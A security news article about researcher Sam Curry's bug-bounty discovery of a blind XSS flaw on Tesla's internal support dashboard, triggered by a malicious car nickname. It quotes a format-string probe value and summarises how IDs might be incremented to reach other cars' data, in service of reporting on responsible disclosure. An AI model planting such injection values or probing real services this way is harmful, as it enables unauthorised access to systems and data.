The Expert's View with Jeremy Kirk

Application Security , Next-Generation Technologies & Secure Development , Threat Hunting

How a Big Rock Revealed a Tesla XSS Vulnerability

Bug Hunter Sam Curry's Find Left Tesla Slightly Red-Faced
How a Big Rock Revealed a Tesla XSS Vulnerability
A Tesla Model 3 (Photo: Tesla)

Software vulnerabilities sometimes have an uncanny knack of revealing themselves, even when a bug hunter is looking someplace else.

See Also: Webinar | Beyond Managed Security Services: SOC-as-a-Service for Financial Institutions

Sam Curry's find wouldn't have been revealed except for an unfortunate circumstance: A big rock cracked the windshield of his black Tesla 3 while driving through Colorado. The rock, however, eventually led to Curry collecting a $10,000 bug bounty from the electric car company.

"I think they were almost embarrassed when I reported this because the way they reacted to this was 'Aw jeez.'" 

Curry, a 19-year-old who runs a web application security consultancy called 17security LLC near Omaha, Nebraska, had been trying to hack his Tesla 3 for a few months. He focuses on finding bugs for bounties.

Sam Curry

When he eventually found a bug, Tesla's security team responded immediately to his report and quickly fixed the problem.

"Their security team was absolutely fantastic," Curry tells me. "I think they were almost embarrassed when I reported this because the way they reacted to this was 'Aw jeez.'"

What's in a Name? XSS

Curry writes in a blog post that he'd been trying to find a flaw within Telsa's web browser, which is a pared-down version of Google's Chromium.

Then in April, he experimented with naming his Tesla. Owners can assign their car a nickname, which is displayed in the mobile app. Curry set his car's name to "%x.%x.%x.%x."

That's a type of format string attack. A vulnerable application may try to execute the string, causing unintended consequences. At one time, BMW's 2011 330i was vulnerable to this kind of attack, which could remotely crash the multimedia software due to an issue with its Bluetooth stack , designated CVE-2017-9212.

But the naming approach didn't work. So he decided to change the car's name to a cross-site scripting payload that came from XSS Hunter, a tool for finding these types of vulnerabilities.

Curry changed his car's name to an XSS payload. (Source: Sam Curry)

Nothing happened, or at least not right away. Curry says he had a month of free time earlier this year and decided to drive across the U.S.

"I went on this super long - probably like 70 hours of driving - road trip," he says. "We were driving through Colorado and this rock just crack my windshield. I was pretty bummed out."

He filed a support note through Tesla's mobile app, which connects to the car, and resumed his trip.

Payload Fires

The support request with his unorthodox car name caused the XSS payload to fire on the domain "garage.vn.teslamotors.com." Bingo. On Tesla's end, a support rep had just pulled up the live diagnostics from Curry's car on a support dashboard.

XSS Hunter sent an email notification with the URL of the vulnerable page as well as a screenshot, which showed the dashboard that had diagnostic information on the state of Curry's vehicle. The URL contained part of his car's VIN, which potentially could be incremented via an insecure direct object reference flaw (see Security Flaw Exposed Valid Airline Boarding Passes).

Curry's XSS script triggered when a Tesla support rep responded to his support request. (Source: Sam Curry)

Although Curry says he didn't take it that far, he writes in his post that "it is likely that by incrementing the ID sent to the vitals endpoint, an attacker could pull and modify information about other cars. If I were an attacker attempting to compromise this, I'd probably have to submit a few support requests, but I'd eventually be able to learn enough about their environment via viewing the DOM and JavaScript to forge a request to do exactly what I'd want to do."

Curry says the dashboard application also has a public version, but what he saw was a screenshot of the internal one. He thinks it may have been possible to pull a cookie and access the public version, which may have allowed him to interact with any vehicle. Support representatives also use the dashboard to push software updates to Teslas.

"You could have pretty much pulled live information from any vehicle in that panel," he says.

Tesla triaged the bug and released a hot fix within 12 hours, he writes. Tesla paid Curry a $10,000 bounty in about two weeks.

Speed Demon?

One question remains, however. Curry posted the screenshot of his vehicle's diagnostic information that was sent to him by XSS Hunter.

His speed at 3:09 p.m. on June 19 was 81 mph. Hmm.

Diagnostic data showing the status of Curry's Telsa when the company addressed his support request. (Source: Sam Curry)

I asked Curry where he was in Colorado. He told me: "Somewhere where the speed limit's 81 mph. One of those big highways. I was on the autobahn."



About the Author

Jeremy Kirk

Jeremy Kirk

Managing Editor, Security and Technology, ISMG

Kirk is a veteran journalist who has reported from more than a dozen countries. Based in Sydney, he is Managing Editor for Security and Technology for Information Security Media Group. Prior to ISMG, he worked from London and Sydney covering computer security and privacy for International Data Group. Further back, he covered military affairs from Seoul, South Korea, and general assignment news for his hometown paper in Illinois.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.com, you agree to our use of cookies.